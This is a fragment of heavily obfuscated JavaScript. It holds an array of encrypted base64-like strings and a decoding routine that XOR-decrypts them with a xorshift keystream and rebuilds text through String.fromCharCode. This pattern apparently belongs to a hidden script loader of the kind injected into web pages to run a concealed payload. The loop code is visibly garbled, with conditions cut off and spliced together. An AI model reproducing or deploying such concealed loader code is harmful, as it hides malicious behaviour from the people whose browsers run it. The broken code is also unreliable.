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"],iwHFf=null,TqTvm=[45,62,41,36],Cajps=72,Utk="",ISSZQ=0,L8XHW={},hm2fV="",WfELY=0,aRR="",i2YKL=0,SUzwL=0,WhbN="";if(iwHFf){for(ISSZQ=0;ISSZQ>4));if(ISSZQ+2>2));if(ISSZQ+3>>0;for(ISSZQ=0;ISSZQ>>0))>>>0;vdILh=(vdILh^(vdILh>>>17))>>>0;vdILh=(vdILh^((vdILh<<5)>>>0))>>>0;aRR+=Q['String']['fromCharCode'](hm2fV.charCodeAt(ISSZQ)^(vdILh&255));}for(ISSZQ=0;ISSZQ>4));if(ISSZQ+2>2));if(ISSZQ+3>>0;for(ISSZQ=0;ISSZQ>>0))>>>0;vdILh=(vdILh^(vdILh>>>17))>>>0;vdILh=(vdILh^((vdILh<<5)>>>0))>>>0;aRR+=Q['String']['fromCharCode'](hm2fV.charCodeAt(ISSZQ)^(vdILh&255));}for(ISSZQ=0;ISSZQ